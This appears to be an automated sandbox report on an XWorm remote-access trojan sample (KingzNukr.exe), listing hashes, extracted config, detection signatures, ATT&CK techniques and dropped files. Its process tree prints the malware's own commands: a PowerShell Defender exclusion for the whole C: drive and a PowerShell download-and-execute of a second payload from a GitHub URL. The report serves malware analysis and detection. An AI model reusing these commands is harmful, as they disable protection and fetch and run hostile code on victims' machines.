xworm | 1984c942f8518f3095bba7b410feeb4dc85192175be753e1d54a418481944312

Analysis

max time kernel
8s
max time network
9s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
01/03/2025, 00:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

KingzNukr.exe
Size

8.1MB
MD5

d8938e38e19f826433a8cb609489821b
SHA1

891dc57fc9c08e0416f4e1cf789e52543dad9bd5
SHA256

1984c942f8518f3095bba7b410feeb4dc85192175be753e1d54a418481944312
SHA512

2d753ed24f92d6dbc81f164d17f98c02f9c2bb9018efbffde22666a6a762f231072a6da69ec62b26c21225d486c9c8ff5a2c72a5308c77be7055c460df06c88f
SSDEEP

196608:H5m8RkdIlenXMCHGLLc54i1wN+VrRRu7NtbFRKnZMZDo0mhcTNYlBnTNY:ZmNKEnXMCHWUjtrRQ7XbFsn6ZEDfN

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%AppData%
install_file
HostProcess.exe
pastebin_url
https://pastebin.com/raw/qgLLv6rU

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000500000001e923-81.dat	family_xworm
behavioral1/memory/1868-83-0x0000000000CA0000-0x0000000000CD2000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
32	2816	powershell.exe
33	2816	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3200	powershell.exe
2816	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
33	2816	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1868	wast.exe

Loads dropped DLL 15 IoCs

pid	Process
548	KingzNukr.exe
548	KingzNukr.exe
548	KingzNukr.exe
548	KingzNukr.exe
548	KingzNukr.exe
548	KingzNukr.exe
548	KingzNukr.exe
548	KingzNukr.exe
548	KingzNukr.exe
548	KingzNukr.exe
548	KingzNukr.exe
548	KingzNukr.exe
548	KingzNukr.exe
548	KingzNukr.exe
548	KingzNukr.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3200	powershell.exe
3200	powershell.exe
2816	powershell.exe
2816	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	1868	wast.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3616 wrote to memory of 548	3616	KingzNukr.exe	88
PID 3616 wrote to memory of 548	3616	KingzNukr.exe	88
PID 548 wrote to memory of 3604	548	KingzNukr.exe	90
PID 548 wrote to memory of 3604	548	KingzNukr.exe	90
PID 3604 wrote to memory of 844	3604	cmd.exe	91
PID 3604 wrote to memory of 844	3604	cmd.exe	91
PID 3604 wrote to memory of 3200	3604	cmd.exe	92
PID 3604 wrote to memory of 3200	3604	cmd.exe	92
PID 3604 wrote to memory of 2816	3604	cmd.exe	95
PID 3604 wrote to memory of 2816	3604	cmd.exe	95
PID 3604 wrote to memory of 1868	3604	cmd.exe	98
PID 3604 wrote to memory of 1868	3604	cmd.exe	98

C:\Users\Admin\AppData\Local\Temp\KingzNukr.exe
"C:\Users\Admin\AppData\Local\Temp\KingzNukr.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3616
- C:\Users\Admin\AppData\Local\Temp\KingzNukr.exe
  "C:\Users\Admin\AppData\Local\Temp\KingzNukr.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\MyScripts\a.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3604
  - - C:\Windows\system32\openfiles.exe
      openfiles
      4⤵
      PID:844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Invoke-WebRequest -Uri "https://github.com/cybr000/ilikebigballs/releases/download/wast/wast.exe" -OutFile "C:\Users\Admin\AppData\Local\Temp\wast.exe"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2816
  - - C:\Users\Admin\AppData\Local\Temp\wast.exe
      "C:\Users\Admin\AppData\Local\Temp\wast.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\_bz2.pyd

Filesize
83KB

MD5
c17dcb7fc227601471a641ec90e6237f

SHA1
c93a8c2430e844f40f1d9c880aa74612409ffbb9

SHA256
55894b2b98d01f37b9a8cf4daf926d0161ff23c2fb31c56f9dbbac3a61932712

SHA512
38851cbd234a51394673a7514110eb43037b4e19d2a6fb79471cc7d01dbcf2695e70df4ba2727c69f1fed56fc7980e3ca37fddff73cc3294a2ea44facdeb0fa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\_decimal.pyd

Filesize
274KB

MD5
ad4324e5cc794d626ffccda544a5a833

SHA1
ef925e000383b6cad9361430fc38264540d434a5

SHA256
040f361f63204b55c17a100c260c7ddfadd00866cc055fbd641b83a6747547d5

SHA512
0a002b79418242112600b9246da66a5c04651aecb2e245f0220b2544d7b7df67a20139f45ddf2d4e7759ce8cc3d6b4be7f98b0a221c756449eb1b6d7af602325

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\_hashlib.pyd

Filesize
63KB

MD5
422e214ca76421e794b99f99a374b077

SHA1
58b24448ab889948303cdefe28a7c697687b7ebc

SHA256
78223aef72777efc93c739f5308a3fc5de28b7d10e6975b8947552a62592772b

SHA512
03fcccc5a300cc029bef06c601915fa38604d955995b127b5b121cb55fb81752a8a1eec4b1b263ba12c51538080335dabaef9e2b8259b4bf02af84a680552fa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\_lzma.pyd

Filesize
155KB

MD5
66a9028efd1bb12047dafce391fd6198

SHA1
e0b61ce28ea940f1f0d5247d40abe61ae2b91293

SHA256
e44dea262a24df69fd9b50b08d09ae6f8b051137ce0834640c977091a6f9fca8

SHA512
3c2a4e2539933cbeb1d0b3c8ef14f0563675fd53b6ef487c7a5371dfe2ee1932255f91db598a61aaadacd8dc2fe2486a91f586542c52dfc054b22ad843831d1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\_queue.pyd

Filesize
34KB

MD5
955b197c38ea5bd537ce9c7cb2109802

SHA1
8feffcb11740ddafc4479fc008cc06c6b570a8bc

SHA256
73cade82ee139459fe5841e5631274fc9caf7f579418b613f278125435653539

SHA512
cab0d8d10fb3bff72d20b287901ccd9be685796142cd2e45e4712cd6f4551dec69180490c2fdfad262c6927a3c7f4fefe68187f64c066731fe17012f78a0ed69

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\_socket.pyd

Filesize
82KB

MD5
abf998769f3cba685e90fa06e0ec8326

SHA1
daa66047cf22b6be608127f8824e59b30c9026bf

SHA256
62d0493ced6ca33e2fd8141649dd9889c23b2e9afc5fdf56edb4f888c88fb823

SHA512
08c6b3573c596a15accf4936533567415198a0daab5b6e9824b820fd1f078233bbc3791fde6971489e70155f7c33c1242b0b0a3a17fe2ec95b9fadae555ed483

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\_ssl.pyd

Filesize
178KB

MD5
cf541cc288ac0bec9b682a2e0011d1ff

SHA1
ef0dd009fdad14b3f6063619112dcdfafb17186d

SHA256
e94f0195363c5c9babfc4c17ec6fb1aa8bbabf59e377db66ce6a79c4c58bbd07

SHA512
f97e7fc644356bebe7e3deaa46b7de61118b13af99c9e91d0fbcbe3caea0c941265bcb28fee31a22fc3031c6428517c5202c1425654f3c2cd234979c9e3c04b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\base_library.zip

Filesize
1.3MB

MD5
18c3f8bf07b4764d340df1d612d28fad

SHA1
fc0e09078527c13597c37dbea39551f72bbe9ae8

SHA256
6e30043dfa5faf9c31bd8fb71778e8e0701275b620696d29ad274846676b7175

SHA512
135b97cd0284424a269c964ed95b06d338814e5e7b2271b065e5eabf56a8af4a213d863dd2a1e93c1425fadb1b20e6c63ffa6e8984156928be4a9a2fbbfd5e93

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\certifi\cacert.pem

Filesize
287KB

MD5
52a8319281308de49ccef4850a7245bc

SHA1
43d20d833b084454311ca9b00dd7595c527ce3bb

SHA256
807897254f383a27f45e44f49656f378abab2141ede43a4ad3c2420a597dd23f

SHA512
2764222c0cd8c862906ac0e3e51f201e748822fe9ce9b1008f3367fdd7f0db7cc12bf86e319511157af087dd2093c42e2d84232fae023d35ee1e425e7c43382d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\charset_normalizer\md.cp313-win_amd64.pyd

Filesize
10KB

MD5
480b5eb45af69a315bd2c3b1b34459d1

SHA1
e056c3e8b3c4d46163e105e6095703d092676b5b

SHA256
1f8a5173d8bfe6c569e81c738b830800307ed4586d2ae9ac5cc13a468c6e1892

SHA512
2aefd6356cf6f9ab773e0c19d828c065b41447b0da24c98d0fa2e14b9580e5e7e8f5d3b707e73f682cad85a199f134c42b103740caf3173e8f29e75dadda6623

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\charset_normalizer\md__mypyc.cp313-win_amd64.pyd

Filesize
122KB

MD5
501b867c424a8e3a41a9be4ab22dbeed

SHA1
97bf5d2c9fa5bb833e739b183a01ce53d19f4a6c

SHA256
437ceb75e7bc7c72c9090558397ef3598b0bc7bc499434af5827028083d300ca

SHA512
38b2d7f2587d73d2edf9cb685ef920ea4c511b88ae9cc25f7fc65d04a87e07ac03024228b9119adfd6914441089cf13ad9d67ff144cf86576cb37d97946677ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\libcrypto-3.dll

Filesize
5.0MB

MD5
123ad0908c76ccba4789c084f7a6b8d0

SHA1
86de58289c8200ed8c1fc51d5f00e38e32c1aad5

SHA256
4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43

SHA512
80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\libssl-3.dll

Filesize
774KB

MD5
4ff168aaa6a1d68e7957175c8513f3a2

SHA1
782f886709febc8c7cebcec4d92c66c4d5dbcf57

SHA256
2e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950

SHA512
c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\python313.dll

Filesize
5.8MB

MD5
3aad23292404a7038eb07ce5a6348256

SHA1
35cac5479699b28549ebe36c1d064bfb703f0857

SHA256
78b1dd211c0e66a0603df48da2c9b67a915ab3258701b9285d3faa255ed8dc25

SHA512
f5b6ef04e744d2c98c1ef9402d7a8ce5cda3b008837cf2c37a8b6d0cd1b188ca46585a40b2db7acf019f67e6ced59eff5bc86e1aaf48d3c3b62fecf37f3aec6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\select.pyd

Filesize
31KB

MD5
62fe3761d24b53d98cc9b0cbbd0feb7c

SHA1
317344c9edf2fcfa2b9bc248a18f6e6acedafffb

SHA256
81f124b01a85882e362a42e94a13c0eff2f4ccd72d461821dc5457a789554413

SHA512
a1d3da17937087af4e5980d908ed645d4ea1b5f3ebfab5c572417df064707cae1372b331c7096cc8e2e041db9315172806d3bc4bb425c6bb4d2fa55e00524881

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36162\unicodedata.pyd

Filesize
695KB

MD5
43b8b61debbc6dd93124a00ddd922d8c

SHA1
5dee63d250ac6233aac7e462eee65c5326224f01

SHA256
3f462ee6e7743a87e5791181936539642e3761c55de3de980a125f91fe21f123

SHA512
dd4791045cf887e6722feae4442c38e641f19ec994a8eaf7667e9df9ea84378d6d718caf3390f92443f6bbf39840c150121bb6fa896c4badd3f78f1ffe4de19d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o5beb4kg.nob.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wast.exe

Filesize
174KB

MD5
216a0edb67ca8f48ea236231990d4428

SHA1
a22170d0f46c22067edb59b57e248bdf1124443a

SHA256
fcd0f33e0ceec677504b7c9365caab9409804ba914211ac2c2fa9c919ec07fc9

SHA512
cbd5a1c0fd3758c2a6de2a4e4456af820715c3a574a44b17081307c068c7dddb94a80b0606e9cdaf9d9259c5e8becbf0dcdae4759ec52e1df1f524a2ac1de502

Download Submit
C:\Users\Admin\AppData\Roaming\MyScripts\a.bat

Filesize
755B

MD5
558c5771d70b8be73f842deca79e326d

SHA1
e908e536eb11762057182186a0ef829a9c0eb079

SHA256
2a22cd20d785aa6353d3d11948c2d18b147b06bda8764cd0195a60b7270408a3

SHA512
5f8a5ede0564af5500eff6b3ad06352e481a9a1e47e3478923d718e1ac0cd9bd9326c7ab312ba4896d6f73762bf3d4cc79aff9f263941cf2cfba57c37f0f47aa

Download Submit
memory/1868-83-0x0000000000CA0000-0x0000000000CD2000-memory.dmp

Filesize
200KB

Download
memory/3200-57-0x0000029DF1E10000-0x0000029DF1E32000-memory.dmp

Filesize
136KB

Download
memory/3200-62-0x00007FFB613D0000-0x00007FFB61E91000-memory.dmp

Filesize
10.8MB

Download
memory/3200-63-0x00007FFB613D0000-0x00007FFB61E91000-memory.dmp

Filesize
10.8MB

Download
memory/3200-66-0x00007FFB613D0000-0x00007FFB61E91000-memory.dmp

Filesize
10.8MB

Download
memory/3200-51-0x00007FFB613D3000-0x00007FFB613D5000-memory.dmp

Filesize
8KB

Download